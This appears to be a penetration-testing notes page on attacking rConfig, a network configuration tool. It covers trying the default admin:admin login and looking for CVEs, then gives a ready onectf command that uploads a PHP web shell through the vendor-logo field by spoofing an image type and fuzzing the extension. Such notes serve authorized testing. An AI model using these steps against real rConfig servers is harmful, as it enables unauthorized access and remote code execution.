rConfig

shells_and_payloads

rConfig is a network configuration management tool. Judging by its GitHub repository (around 0.5k ⭐), it is not widely deployed.

  • Look for web interface on port 80
  • Test default credentials admin:admin

Look for well-known CVEs; the version number is displayed at the bottom of the page.

If you log in successfully, try to upload a shell. Navigate to Devices > Vendors, click Add Vendor and try to abuse the image (vendor logo) field: send a PHP file with an image content type and fuzz the filename extension. For reference, with onectf:

$ onectf uffuf -u 'https://IP/lib/crud/vendors.crud.php' -v -k --nr -H 'Cookie: PHPSESSID=XXX' -d 'vendorName=onectf&add=add&editid=' -p vendorLogo -F webshell.php -Fn imageFUZZ -Ft image/gif -W .php
[302 or 200] means the upload was accepted (OK)
[301] means it was rejected (KO)